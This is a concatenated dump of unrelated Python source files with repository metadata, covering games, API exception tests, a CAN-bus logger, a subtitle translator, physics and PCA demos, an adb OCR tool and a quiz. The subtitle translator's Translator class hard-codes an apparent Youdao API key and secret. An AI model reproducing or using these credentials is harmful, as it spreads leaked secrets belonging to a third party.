pygame.display.set_mode([1280,720], pygame.RESIZABLE)\n pygame.mouse.set_visible(False)\n pygame.event.set_grab(True)\n \n pfont = pygame.font.SysFont(\"Consolas\", 14)\n bfont = pygame.font.SysFont(\"Arial\", 32)\n \n cam = pg3d.camera(pg3d.point(0,0, -75), [0,0,0], pg3d.point(0,0,1000))\n \n \n while True:\n #ttt = game.board([game.player(\"Player 1\", (255,0,0)), game.bot(\"Player 2\", (0,0,255)), game.bot(\"Player 3\", (0,255,0)), game.bot(\"Player 4\", (255,255,0))], 0)\n ttt = game.board([game.bot(\"Player 1\", (255,0,0), 4), game.player(\"Player 2\", (0,0,255))], 0)\n runGame(screen, ttt, pfont, bfont, cam)\n\nif __name__ == \"__main__\":\n main(sys.argv)","repo_name":"meslane/3DTicTacToe","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8801,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"21481358843","text":"# -*- coding: utf-8 -*-\n\"\"\"Various tests for checking exceptions in views.\"\"\"\nimport pytest\n\nimport copy\nimport logging\n\nimport colander\n\nimport simplejson as json\n\nfrom webtest.app import AppError\n\nfrom moe.tests.optimal_learning.python.gaussian_process_test_case import GaussianProcessTestCase\nfrom moe.tests.views.rest_test_case import RestTestCase\nfrom moe.views.constant import ALL_REST_MOE_ROUTES, GP_MEAN_VAR_ENDPOINT, GP_NEXT_POINTS_EPI_ENDPOINT\nfrom moe.views.exceptions import general_error, failed_colander_validation\nfrom moe.views.gp_next_points_pretty_view import GpNextPointsPrettyView\nfrom moe.views.rest.gp_mean_var import GpMeanVarView\nfrom moe.views.schemas.gp_next_points_pretty_view import GpNextPointsRequest\nfrom moe.views.schemas.rest.gp_mean_var import GpMeanVarRequest\nfrom moe.views.utils import _make_gp_from_params\n\n\n@pytest.fixture(autouse=True, scope='module')\ndef disable_logging(request):\n \"\"\"Disable logging (for the duration of this test case).\"\"\"\n logging.disable(logging.CRITICAL)\n\n def finalize():\n \"\"\"Re-enable logging (so other test cases are unaffected).\"\"\"\n logging.disable(logging.NOTSET)\n request.addfinalizer(finalize)\n\n\nclass TestRestGaussianProcessWithExceptions(GaussianProcessTestCase, RestTestCase):\n\n \"\"\"Test that proper errors are thrown when endpoints bad data.\"\"\"\n\n def test_empty_json_payload_invalid(self):\n \"\"\"Test empty json payload causes an AppError.\"\"\"\n for moe_route in ALL_REST_MOE_ROUTES:\n with pytest.raises(AppError):\n self.testapp.post(moe_route.endpoint, {})\n\n def test_badly_formed_json_payload_invalid(self):\n \"\"\"Test malformed json payload causes a ValueError.\"\"\"\n truth_result = self.testapp.post(GP_MEAN_VAR_ENDPOINT, '}', expect_errors=True)\n for moe_route in ALL_REST_MOE_ROUTES:\n test_result = self.testapp.post(moe_route.endpoint, '}', expect_errors=True)\n assert truth_result.body == test_result.body\n\n def test_invalid_hyperparameters_input(self):\n \"\"\"Test that invalid hyperparameters (via GP_MEAN_VAR_ENDPOINT) generate expected Response with error message.\"\"\"\n endpoint = GP_MEAN_VAR_ENDPOINT\n dict_payload = copy.deepcopy(GpMeanVarView._pretty_default_request)\n\n # Invalidate a hyperparameter\n dict_payload['covariance_info']['hyperparameters'][0] *= -1.0\n result = self.testapp.post(endpoint, json.dumps(dict_payload), expect_errors=True)\n\n # Get the colander exception that arises from processing invalid hyperparameters\n request_schema = GpMeanVarRequest()\n\n with pytest.raises(colander.Invalid) as request_exception:\n request_schema.deserialize(dict_payload)\n\n assert result.body == failed_colander_validation(request_exception.value, result.request).body\n\n def test_invalid_points_sampled_input(self):\n \"\"\"Test that duplicate points_sampled (via GP_NEXT_POINTS_EPI_ENDPOINT) generate expected Response with error message.\"\"\"\n endpoint = GP_NEXT_POINTS_EPI_ENDPOINT\n dict_payload = copy.deepcopy(GpNextPointsPrettyView._pretty_default_request)\n\n # Invalidate historical info: 0.0 noise and add a duplicate point\n for sample_point in dict_payload['gp_historical_info']['points_sampled']:\n sample_point['value_var'] = 0.0\n\n dict_payload['gp_historical_info']['points_sampled'].append(dict_payload['gp_historical_info']['points_sampled'][0])\n result = self.testapp.post(endpoint, json.dumps(dict_payload), expect_errors=True)\n\n # Get the exception that arises from processing invalid hyperparameters\n request_schema = GpNextPointsRequest()\n params = request_schema.deserialize(dict_payload)\n\n with pytest.raises(Exception) as request_exception:\n _make_gp_from_params(params)\n\n assert result.body == general_error(request_exception.value, result.request).body\n","repo_name":"Yelp/MOE","sub_path":"moe/tests/views/exceptions_test.py","file_name":"exceptions_test.py","file_ext":"py","file_size_in_byte":3954,"program_lang":"python","lang":"en","doc_type":"code","stars":1307,"dataset":"github-code","pt":"32"} +{"seq_id":"14511700734","text":"from socket import *\nfrom libcanbadger import EthernetMessage, EthernetMessageType, ActionType\nimport struct\nimport sys\nimport time\nimport matplotlib.pyplot as plt\nimport statistics\n\n\nclass BroadcastDeafSocket(socket):\n def __init__(self, family, type):\n super().__init__(family, type)\n self.cant_hear = 'CB|'.encode('ascii')\n\n def recvfrom(self, bufsize: int):\n while True:\n resp, add = super().recvfrom(bufsize)\n\n if resp[0:3] != self.cant_hear:\n return resp, add\n\n def recv(self, bufsize: int) -> bytes:\n while True:\n resp = super().recv(bufsize)\n if resp[0:3] != self.cant_hear:\n return resp\n\n\ndef print_formatted_log(data, count):\n print('\\n' + f'Log Message {count}' + '\\n' + '---------------')\n if data[0] == 0x15:\n print('Interface : 1\\n')\n elif data[0] == 0x16:\n print('Interface : 2\\n')\n else:\n print('Interface ERROR!\\n')\n\ndef print_statistics(values, name, ns = None, bins = None):\n print(f\"\\n{name} stats:\\n-----------------------\")\n\n # print median and mean\n mean = statistics.mean(values)\n print(f\"Median: {statistics.median(values)}\")\n print(f\"Mean: {mean}\")\n\n # biggest buckets\n if ns is not None and bins is not None:\n biggest = [i for i, j in enumerate(ns) if j == max(ns)]\n print(f\"\\nBiggest bucket(s) for {name} (measured {len(values)} times):\")\n for i in biggest:\n print(f\"{ns[i]:.0f} in {bins[i]:.3f}-{bins[i+1]:.3f}\")\n\n # outliers\n if ns is not None and bins is not None:\n bucket_indices = [i for i, j in enumerate(ns) if j > 0]\n leftmost = bucket_indices[0]\n rightmost = bucket_indices[-1]\n print(f\"Outliers: {ns[leftmost]:.0f} in {bins[leftmost]:.3f}-{bins[leftmost+1]:.3f} \"\n f\"(> {(mean - bins[leftmost+1]):.3f} from mean) || \"\n f\"{ns[rightmost]:.0f} in {bins[rightmost]:.3f}-{bins[rightmost+1]:.3f} \"\n f\"(> {(bins[rightmost] - mean):.3f} from mean)\")\n\n\n# script vars\ncanbadger_ip = '10.0.0.125'\n\n\ntcp_sock = socket(AF_INET, SOCK_STREAM)\ntcp_sock.bind(('', 13372))\ntcp_sock.listen(1)\n\n\n\n# extra udp socket to send CONNECT over udp\nconn_sock = socket(AF_INET, SOCK_DGRAM)\nconn_sock.bind(('', 13370))\n\n# connection request\nconn_sock.sendto(EthernetMessage(EthernetMessageType.CONNECT, ActionType.NO_TYPE, 4, struct.pack(' 4:\n print(self.cache)\n raise ValueError\n self.cache = []\n\n def read_file(self, path):\n with open(path, 'r', encoding='UTF-8') as f:\n lines = f.readlines()\n for line in lines:\n self.process_line(line)\n print('Srt File Loaded!')\n\n def print_len(self):\n print('self.number: ', len(self.number))\n print('self.timeline: ', len(self.timeline))\n print('self.chinese: ', len(self.chinese))\n print('self.english: ', len(self.english))\n\n def revise_num(self):\n length = len(self.number)\n self.number = [str(_) for _ in range(1, length + 1)]\n\n def str2time(self, time_str):\n t = time_str.split(',')\n t_0, t_1 = t[0].split(':'), [t[1]]\n t = t_0 + t_1\n t = [int(_) for _ in t]\n time_sec = 3600 * t[0] + 60 * t[1] + t[2] + t[3] / 1000\n return time_sec\n\n def time2str(self, time_sec):\n time_list = [0, 0, 0, 0]\n t = math.modf(time_sec)\n t_0, t_1 = int(t[0] * 1000), t[1]\n time_list[3] = t_0\n time_list[0] = math.floor(t_1 / 3600)\n t_1 = t_1 % 3600\n time_list[1] = math.floor(t_1 / 60)\n t_1 = t_1 % 60\n time_list[2] = math.floor(t_1)\n return '%02d:%02d:%02d,%03d' % (time_list[0], time_list[1], time_list[2], time_list[3])\n\n def revise_time(self):\n time_line = []\n for timestep in self.timeline:\n t_s, t_e = [self.str2time(_) for _ in timestep.split(self.TIME_SEP)]\n time_line.append(t_s)\n time_line.append(t_e)\n length_t = len(time_line)\n count = 0\n while count < length_t - 1:\n if time_line[count] > time_line[count + 1]:\n time_line[count] = time_line[count + 1]\n count += 1\n count = 0\n while count < length_t - 2:\n time_line[count + 1] = time_line[count + 2] - 0.03\n count += 2\n count = 0\n while count < length_t - 1:\n t_s = self.time2str(time_line[count])\n t_e = self.time2str(time_line[count + 1])\n t_str = '%s%s%s' % (t_s, self.TIME_SEP, t_e)\n self.timeline[math.floor(count / 2)] = t_str\n count += 2\n\n def revise_all(self):\n self.revise_num()\n self.revise_time()\n\n def revise_chinese_length(self, line_length=26):\n count, length = 0, len(self.chinese)\n while count < length:\n line = self.chinese[count]\n if len(line) > line_length:\n temp = jieba.cut(line)\n c_t, line = 0, ''\n for _ in temp:\n line += _\n c_t += len(_)\n if c_t >= line_length:\n line += '\\\\n'\n c_t = 0\n self.chinese[count] = line\n count += 1\n\n def translate(self, start=0, end=None):\n length = len(self.number)\n if end is None:\n end = length\n count = start\n while count < end:\n self.chinese[count] = self.translator.connect(self.english[count])\n count += 1\n time.sleep(0.5)\n print('Translate complete!')\n\n def write_file(self, path):\n with open(path, 'w', encoding='UTF-8') as f:\n length = len(self.number)\n count = 0\n while count < length:\n f.write(self.number[count] + '\\n')\n f.write(self.timeline[count] + '\\n')\n f.write(self.chinese[count] + '\\n')\n f.write(self.english[count] + '\\n')\n f.write('\\n')\n count += 1\n print('Revised Srt File Created!')\n\n\nclass Translator:\n def __init__(self):\n self.API = 'http://openapi.youdao.com/api'\n self.header = {}\n self.APP_KEY = '3d427783a4e1ba7d'\n self.APP_SECRET = 'NVWeIqTR1vHObxNclVYcvLqj6HidkYwN'\n\n def encrypt(self, signStr):\n hash_algorithm = hashlib.sha256()\n hash_algorithm.update(signStr.encode('utf-8'))\n return hash_algorithm.hexdigest()\n\n def truncate(self, q):\n if q is None:\n return None\n size = len(q)\n return q if size <= 20 else q[0:10] + str(size) + q[size - 10:size]\n\n def do_request(self, data):\n headers = {'Content-Type': 'application/x-www-form-urlencoded'}\n return requests.post(self.API, data=data, headers=headers)\n\n def connect(self, q):\n data = {}\n data['from'] = 'EN'\n data['to'] = 'zh-CHS'\n data['signType'] = 'v3'\n curtime = str(int(time.time()))\n data['curtime'] = curtime\n salt = str(uuid.uuid1())\n signStr = self.APP_KEY + self.truncate(q) + salt + curtime + self.APP_SECRET\n sign = self.encrypt(signStr)\n data['appKey'] = self.APP_KEY\n data['q'] = q\n data['salt'] = salt\n data['sign'] = sign\n\n response = self.do_request(data)\n # print(response.content)\n res = json.loads(response.text)['translation']\n print(res)\n return res[0]\n\n\nif __name__ == '__main__':\n ROOT = os.getcwd()\n file_path = os.path.join(ROOT, 'data', 'version2.2.txt')\n save_path = os.path.join(ROOT, 'result', 'version2.3.srt')\n srt_obj = SrtRevisor()\n srt_obj.read_file(file_path)\n srt_obj.print_len()\n srt_obj.revise_all()\n srt_obj.revise_chinese_length()\n # srt_obj.translate(15)\n srt_obj.write_file(save_path)\n","repo_name":"guoqunabc/SubtitleProccesor","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"6268720201","text":"import numpy\nimport matplotlib\nimport matplotlib.pyplot as plt\nfrom matplotlib.ticker import LinearLocator\nfrom matplotlib import cm\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\n\npaddle_dist = 1\nposition_x = []\nposition_y = []\nvelocity_y = []\ntime = []\n\n\nposition_x = [0]*10000\nposition_y = [0]*10000\nvelocity_y = [0]*10000\n\nvelocity_x = 0.1\n\n\ntime = [0]*10000\n\n\nposition_y[0] = paddle_dist/2\n#paddle_norm_x = round(np.cos(angle),2)\n#paddle_norm_y = round(np.sin(angle),2)\n\n\n#result_angle_x = -(2*(direction_x*paddle_norm_x + direction_y*paddle_norm_y)*paddle_norm_x - direction_x)\n#result_angle_y = (2*(direction_x*paddle_norm_x + direction_y*paddle_norm_y)*paddle_norm_y - direction_y)\n\nincrement = 0.01\n\nfor i in range(1, 100):\n time[i] = time[i-1] + increment\n velocity_y[i] = velocity_y[i-1] +(9.81)*time[i]\n\n position_x[i] = position_x[i-1] + velocity_x*time[i]\n position_y[i] = position_y[i-1] + velocity_y[i]*time[i]\n \n\n \n print(position_y[i])\n\n\n\nfig, axs = plt.subplots(2)\naxs[0].set_title('X vs Y distance')\naxs[0].set_xlabel(\"X distance\")\naxs[0].set_ylabel(\"Y distance \")\naxs[0].plot(position_x, position_y, label=\"ball\")\n\naxs[0].legend()\naxs[0].legend(loc=\"lower left\")\n\n\nplt.tight_layout()\nplt.show()\n","repo_name":"BenLevy7/ME303_PingPong","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"29946858862","text":"import os\nimport ocr\nimport config as configFile\n\n# import cv2\n\nconfig = configFile.general_config\n\n\n# ----- Tools ----- #\n\n\n# ? 未完成\ndef writeFile(text, fileName=\"text.txt\"):\n print(\"@dev正在写入文件...\")\n\n # check if the output location is set and sanitize it\n if(config[\"text_output_location\"] == \"\"):\n print(\"请在config.py中设置text_output_location\")\n return\n if(config[\"text_output_location\"].endswith(\"/\")):\n config[\"text_output_location\"] = config[\"text_output_location\"][:-1]\n \n if(not os.path.exists(config[\"text_output_location\"])):\n os.mkdir(config[\"text_output_location\"]\n )\n \n open(config[\"text_output_location\"] + \"/\" + fileName.replace('/', ''), \"w\").write(text)\n print(text)\n print(\"@dev写入完成, 文件已保存到\" + config[\"text_output_location\"] + \"/\" + fileName.replace('/', ''))\n\n\n#\ndef shell(cmd):\n \"\"\"run shell command, print and return the output\"\"\"\n print(os.popen(cmd).read())\n\n\n# ------------------ #\n\n\ndef main():\n print(\"歡迎使用python 版NovelSnap OCR\")\n # screenshotOCRLoop()\n writeFile(ocr.ocr(\"./cache/screen.png\"))\n print(\"感謝使用\")\n\n\n# ? 未完成\n# take a screenshot and do OCR\ndef screenshotOCRLoop(fileName=\"screen\"):\n imgPath = getScreenshot(fileName + \".png\")\n text = ocr.ocr(imgPath)\n writeFile(text)\n\n\ndef getScreenshot(fileName=\"screen.png\"):\n \"\"\"capture screen on phone using adb, pull it to local,\n clean the screenshot on phone, and return the path of the screenshot.\n Args:\n fileName: the name of the screenshot file, default is \"screen.png\"\n Returns:\n the path of the screenshot\n \"\"\"\n\n print(\"@dev正在截图...\")\n shell(\"adb shell screencap -p \" + config[\"cache_location_android\"] + \"/\" + fileName)\n shell(\n \"adb pull \"\n + config[\"cache_location_android\"]\n + \"/\"\n + fileName\n + \" \"\n + config[\"cache_location_pc\"]\n + \"/\"\n + fileName\n )\n shell(\"adb shell rm \" + config[\"cache_location_android\"] + \"/\" + fileName)\n print(\"@dev截图完成, 图片已缓存到\" + config[\"cache_location_pc\"] + \"/\" + fileName)\n return config[\"cache_location_pc\"] + \"/\" + fileName\n\n\nmain()\n","repo_name":"lingo34/NovelSnap-OCR","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2261,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"71401132570","text":"import matplotlib.pyplot as plt\nimport numpy as np\nfrom scipy.optimize import leastsq, curve_fit\nfrom pathlib import Path\nfrom math import isclose\n\nPath.cwd()\n\ndata1 = np.loadtxt('count55.txt')\ntresh1 = data1[:, 0]/75\ncount1 = data1[:, 1]\ndata1[:,0]= data1[:, 0]/75\n\ndata2 = np.loadtxt('count56.txt')\ntresh2 = data2[:, 0]/118\ncount2 = data2[:, 1]\ndata2[:,0] = data2[:, 0]/118\n\ndata3 = np.loadtxt('count57.txt')\ntresh3 = data3[:, 0]/138\ncount3 = data3[:, 1]\ndata3[:,0] = data3[:, 0]/138\n\ndata4 = np.loadtxt('count58.txt')\ntresh4 = data4[:, 0]/175\ncount4= data4[:, 1]\ndata4[:,0] = data4[:, 0]/175\n\n\ndata5 = np.loadtxt('count59.txt')\ntresh5 = data5[:, 0]/205\ncount5 = data5[:, 1]\ndata5[:,0] = data5[:, 0]/205\n\n\ndatatef1 = np.loadtxt('counttef55.txt')\ntreshtef1 = datatef1[:, 0]/75\ncounttef1 = datatef1[:, 1]\ndatatef1[:,0]= datatef1[:, 0]/75\n\n\ndatatef2 = np.loadtxt('counttef56.txt')\ntreshtef2 = datatef2[:, 0]/118\ncounttef2 = datatef2[:, 1]\ndatatef2[:,0] = datatef2[:, 0]/118\n\n\ndatatef3 = np.loadtxt('counttef57.txt')\ntreshtef3 = datatef3[:, 0]/138\ncounttef3 = datatef3[:, 1]\ndatatef3[:,0] = datatef3[:, 0]/138\n\n\ndatatef4 = np.loadtxt('counttef58.txt')\ntreshtef4 = datatef4[:, 0]/175\ncounttef4= datatef4[:, 1]\ndatatef4[:,0] = datatef4[:, 0]/175\n\n\ndatatef5 = np.loadtxt('counttef59.txt')\ntreshtef5 = datatef5[:, 0]/205\ncounttef5 = datatef5[:, 1]\ndatatef5[:,0] = datatef5[:, 0]/205\n\n#CALCOLO BUIO\na1=np.ma.masked_greater_equal(data1[:,0], 0.5)\na2=np.ma.masked_greater_equal(data2[:,0], 0.5)\na3=np.ma.masked_greater_equal(data3[:,0], 0.5)\na4=np.ma.masked_greater_equal(data4[:,0], 0.5)\na5=np.ma.masked_greater_equal(data5[:,0], 0.5)\n\n\n\nb1=np.ma.masked_greater_equal(data1[:,0], 1.5)\nb2=np.ma.masked_greater_equal(data2[:,0], 1.5)\nb3=np.ma.masked_greater_equal(data3[:,0], 1.5)\nb4=np.ma.masked_greater_equal(data4[:,0], 1.5)\nb5=np.ma.masked_greater_equal(data5[:,0], 1.5)\n\n\n\nPct1=np.mean(data1[np.ma.getmask(b1),1])/np.mean(data1[np.ma.getmask(a1),1])\nPct2=np.mean(data2[np.ma.getmask(b2),1])/np.mean(data2[np.ma.getmask(a2),1])\nPct3=np.mean(data3[np.ma.getmask(b3),1])/np.mean(data3[np.ma.getmask(a3),1])\nPct4=np.mean(data4[np.ma.getmask(b4),1])/np.mean(data4[np.ma.getmask(a4),1])\nPct5=np.mean(data5[np.ma.getmask(b5),1])/np.mean(data5[np.ma.getmask(a5),1])\n\nprint('Pct1=',Pct1)\nprint('Pct2=',Pct2)\nprint('Pct3=',Pct3)\nprint('Pct4=',Pct4)\nprint('Pct5=',Pct5)\n\n\n#CALCOLO CON TEFLON\n\n\nalfa1=np.ma.masked_greater_equal(datatef1[:,0], 0.5)\nalfa2=np.ma.masked_greater_equal(datatef2[:,0], 0.5)\nalfa3=np.ma.masked_greater_equal(datatef3[:,0], 0.5)\nalfa4=np.ma.masked_greater_equal(datatef4[:,0], 0.5)\nalfa5=np.ma.masked_greater_equal(datatef5[:,0], 0.5)\n\n\n\nbeta1=np.ma.masked_greater_equal(datatef1[:,0], 1.5)\nbeta2=np.ma.masked_greater_equal(datatef2[:,0], 1.5)\nbeta3=np.ma.masked_greater_equal(datatef3[:,0], 1.5)\nbeta4=np.ma.masked_greater_equal(datatef4[:,0], 1.5)\nbeta5=np.ma.masked_greater_equal(datatef5[:,0], 1.5)\n\n\n\nPcttef1=np.mean(datatef1[np.ma.getmask(beta1),1])/np.mean(datatef1[np.ma.getmask(alfa1),1])\nPcttef2=np.mean(datatef2[np.ma.getmask(beta2),1])/np.mean(datatef2[np.ma.getmask(alfa2),1])\nPcttef3=np.mean(datatef3[np.ma.getmask(beta3),1])/np.mean(datatef3[np.ma.getmask(alfa3),1])\nPcttef4=np.mean(datatef4[np.ma.getmask(beta4),1])/np.mean(datatef4[np.ma.getmask(alfa4),1])\nPcttef5=np.mean(datatef5[np.ma.getmask(beta5),1])/np.mean(datatef5[np.ma.getmask(alfa5),1])\n\nprint('Pcttef1=',Pcttef1)\nprint('Pcttef2=',Pcttef2)\nprint('Pcttef3=',Pcttef3)\nprint('Pcttef4=',Pcttef4)\nprint('Pcttef5=',Pcttef5)\n\n\nplt.yscale('log')\nplt.ylabel('Counts')\nplt.xlabel('Threshold[mV]')\n\nplt.plot(data1[np.ma.getmask(a1),0],data1[np.ma.getmask(a1),1],label='55 V')\nplt.plot(data2[np.ma.getmask(a2),0],data2[np.ma.getmask(a2),1],label='56 V')\nplt.plot(data3[np.ma.getmask(a3),0],data3[np.ma.getmask(a3),1],label='57 V')\nplt.plot(data4[np.ma.getmask(a4),0],data4[np.ma.getmask(a4),1],label='58 V')\nplt.plot(data5[np.ma.getmask(a5),0],data5[np.ma.getmask(a5),1],label='59 V')\nplt.legend(loc=\"upper right\")\n\n\nplt.scatter(data1[np.ma.getmask(a1),0],data1[np.ma.getmask(a1),1],label='55 V')\nplt.scatter(data2[np.ma.getmask(a2),0],data2[np.ma.getmask(a2),1],label='56 V')\nplt.scatter(data3[np.ma.getmask(a3),0],data3[np.ma.getmask(a3),1],label='57 V')\nplt.scatter(data4[np.ma.getmask(a4),0],data4[np.ma.getmask(a4),1],label='58 V')\nplt.scatter(data5[np.ma.getmask(a5),0],data5[np.ma.getmask(a5),1],label='59 V')\n\nplt.show()\n\n\nplt.yscale('log')\nplt.ylabel('Counts')\nplt.xlabel('Threshold[mV]')\n\n\nplt.plot(datatef1[np.ma.getmask(alfa1),0],datatef1[np.ma.getmask(alfa1),1],label='55 V')\nplt.plot(datatef2[np.ma.getmask(alfa2),0],datatef2[np.ma.getmask(alfa2),1],label='56 V')\nplt.plot(datatef3[np.ma.getmask(alfa3),0],datatef3[np.ma.getmask(alfa3),1],label='57 V')\nplt.plot(datatef4[np.ma.getmask(alfa4),0],datatef4[np.ma.getmask(alfa4),1],label='58 V')\nplt.plot(datatef5[np.ma.getmask(alfa5),0],datatef5[np.ma.getmask(alfa5),1],label='59 V')\nplt.legend(loc=\"upper right\")\n\n\nplt.scatter(datatef1[np.ma.getmask(alfa1),0],datatef1[np.ma.getmask(alfa1),1],label='55 V')\nplt.scatter(datatef2[np.ma.getmask(alfa2),0],datatef2[np.ma.getmask(alfa2),1],label='56 V')\nplt.scatter(datatef3[np.ma.getmask(alfa3),0],datatef3[np.ma.getmask(alfa3),1],label='57 V')\nplt.scatter(datatef4[np.ma.getmask(alfa4),0],datatef4[np.ma.getmask(alfa4),1],label='58 V')\nplt.scatter(datatef5[np.ma.getmask(alfa5),0],datatef5[np.ma.getmask(alfa5),1],label='59 V')\n\n\nplt.show()","repo_name":"francescouni0/FisMedLab","sub_path":"Sipm/CrossTalk.py","file_name":"CrossTalk.py","file_ext":"py","file_size_in_byte":5424,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"8838536465","text":"#!/usr/bin/env python3\n\nimport os\n\nimport telebot\n\nfrom logger import init_logger\nfrom utils.utils import get_project_names_list, get_all_fans_count\nfrom set_vars import set_vars\nset_vars()\n\njobs_logger = init_logger('jobs logger')\n\ntoken = os.environ.get('BOT_TOKEN')\nCHAT_ID = os.environ.get('CHAT_ID')\njobs_logger.info('envinron variables received')\n\nbot = telebot.TeleBot(token)\n\n\nclass Job(object):\n @staticmethod\n def get_all_fans_job():\n jobs_logger.info(\"job started\")\n project_names_list = get_project_names_list()\n result = get_all_fans_count(project_names_list)\n # result = ['Сейчас', '12 часов', 'дня']\n for message in result:\n bot.send_message(CHAT_ID, message)\n jobs_logger.info(\"job done\")\n\n\nif __name__ == '__main__':\n Job.get_all_fans_job()\n","repo_name":"LuckCky/counterbot","sub_path":"scheduler_job.py","file_name":"scheduler_job.py","file_ext":"py","file_size_in_byte":834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"11149520766","text":"\"\"\"\nA utility function for av related tasks.\n\"\"\"\n\nimport numpy as np\nfrom PIL import Image\nfrom matplotlib import pyplot as plt\nimport networkx as nx\n\n\ndef get_onh_radius(av_data_set):\n return np.linalg.norm(av_data_set.get_graph('onh')[0] - av_data_set.get_graph('onh_pos'))\n\n\ndef get_av_nodes_positions(av_data_set=None, vessel=\"\", av_only=True):\n node_marker = av_data_set.get_graph(vessel)\n av_radius = 2.5 * get_onh_radius(av_data_set)\n xc, yc = av_data_set.get_graph('onh_pos')[0]\n for ix, node in enumerate(av_data_set.get_graph('V')):\n x, y = node\n if node_marker[ix] != 1:\n continue\n if ((x - xc) ** 2 + (y - yc) ** 2) < av_radius ** 2 or not av_only:\n yield node\n\n\ndef show_av_graph(av_data_set=None, image_array=None, image_show=True, onh_show=True, av_only=True, gray_scale=None):\n onh = av_data_set.get_graph('onh')\n av_art = np.array(list(get_av_nodes_positions(av_data_set, vessel=\"art\", av_only=av_only)))\n av_ven = np.array(list(get_av_nodes_positions(av_data_set, vessel=\"ven\", av_only=av_only)))\n\n av_art = np.ceil(av_art)\n av_ven = np.ceil(av_ven)\n\n plt.scatter(av_art[:, 0], av_art[:, 1], color='red', s=4.0)\n plt.scatter(av_ven[:, 0], av_ven[:, 1], color='blue', s=4.0)\n\n if onh_show:\n plt.plot(onh[:, 0], onh[:, 1], color='green')\n\n if image_show:\n plt.imshow(Image.fromarray(image_array), aspect='auto', cmap=gray_scale)\n plt.show()\n\n\ndef show_graph(adj_matrix, node_pos=None, node_color='red', edge_color='black'):\n graph = nx.from_scipy_sparse_matrix(adj_matrix)\n nx.draw_networkx(graph, pos=node_pos, edge_color=edge_color, node_color=node_color, with_labels=False, node_size=4,\n width=0.5)\n plt.show()\n\n\ndef color_artery(x): return x == 1 and 'r' or 'b'\n\n\ndef color_vein(x): return x == 1 and 'b' or 'r'\n\n\ndef color_av(a, v):\n if a == 1 and v == 1:\n return 'g'\n if a == 1 and v == 0:\n return 'b'\n if a == 0 and v == 1:\n return 'r'\n return 'g'","repo_name":"saeidmotevali/trackernet","sub_path":"utils/av_utils.py","file_name":"av_utils.py","file_ext":"py","file_size_in_byte":2034,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"70229192413","text":"#### A from-scratch demonstration of the eigenfaces application of PCA using NumPy\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom sklearn.datasets import fetch_lfw_people\n\ndef run(numpca=150):\n\n faces = fetch_lfw_people(min_faces_per_person=60)\n print(faces.images.shape)\n# print(faces.target_names)\n\n#Step 1\n faces_mean=faces.data-np.mean(faces.data,axis=0)\n\n#Step 2\n cov=np.matmul(faces_mean.T,faces_mean)\n\n#Step 3\n eig_val,eig_vec=np.linalg.eigh(cov)\n\n#Step 4 \n indices=np.argsort(eig_val)[::-1]\n eig_val=eig_val[indices]\n eig_vec=eig_vec[:,indices]\n\n#Step 5\n n_comp=numpca\n eig_vec=eig_vec[:,:n_comp]\n eig_valtot=eig_val\n eig_val=eig_val[:n_comp]\n\n pca_components=((faces_mean).dot(eig_vec)) \n\n\n### Plotting the Eigenvectors\n fig, axes = plt.subplots(3, 8, figsize=(9, 4),\n subplot_kw={'xticks':[], 'yticks':[]},\n gridspec_kw=dict(hspace=0.1, wspace=0.1))\n for i, ax in enumerate(axes.flat):\n ax.imshow(eig_vec[:,i].reshape(62,47),cmap='bone')\n \n\n plt.show()\n\n############\n\n\n### Plotting the contribution of each PC to the total variance\n totvar=np.sum(eig_valtot)\n\n explained_var_ratio=eig_valtot/totvar\n\n#Computing the Cumulative Variance of each eigenvector/PC\n\n cumul_sum_eigval=np.cumsum(explained_var_ratio)\n plt.bar(range(0,len(explained_var_ratio)),explained_var_ratio,alpha=0.5,align='center',label='Individual Explained Variance',color='orange' )\n plt.step(range(0,len(cumul_sum_eigval)),cumul_sum_eigval,where='mid',label='Cumulative Explained Variance',linewidth=3.0)\n\n plt.xlabel('number of components')\n plt.ylabel('cumulative explained variance');\n plt.xlim(-5,n_comp)\n plt.ylim(0,1.0)\n plt.tight_layout()\n plt.legend(loc='best')\n plt.show()\n\n############\n \n \n#Step 6 \n pca_inverse_transform=pca_components.dot(eig_vec.T)+np.mean(faces.data,axis=0)\n\n\n#### Plotting the Real Images and PC-Projected Images\n fig, ax = plt.subplots(2, 10, figsize=(10, 2.5),\n subplot_kw={'xticks':[], 'yticks':[]},\n gridspec_kw=dict(hspace=0.1, wspace=0.1))\n for i in range(10):\n ax[0, i].imshow(faces.data[i].reshape(62, 47), cmap='binary_r')\n ax[1, i].imshow(pca_inverse_transform[i].reshape(62, 47), cmap='binary_r')\n \n ax[0, 0].set_ylabel('full-dim\\ninput')\n ax[1, 0].set_ylabel(str(numpca)+'-dim\\nreconstruction');\n\n plt.show()\n","repo_name":"thaynecurrie/phys7943_fall2023","sub_path":"ScientificPythonNotes/NumPy/code/eigenfaces_np.py","file_name":"eigenfaces_np.py","file_ext":"py","file_size_in_byte":2355,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"32"} +{"seq_id":"16527955088","text":"import random\r\nimport webbrowser\r\n\r\ndef provjeri_tablicu():\r\n # Unos broja pitanja od korisnika\r\n broj_pitanja = int(input(\"Unesite broj pitanja za provjeru (do 100): \"))\r\n # u slučaju da je unešen broj pitanja veći od 100\r\n # broj pitanja se postavlja kao 100 jer tablica množenja\r\n # ima 100 pitanja\r\n broj_pitanja = min(broj_pitanja, 100)\r\n\r\n tablica = list(range(1, 11)) # lista brojeva za izbor\r\n pitanja = [] # Lista za pohranu 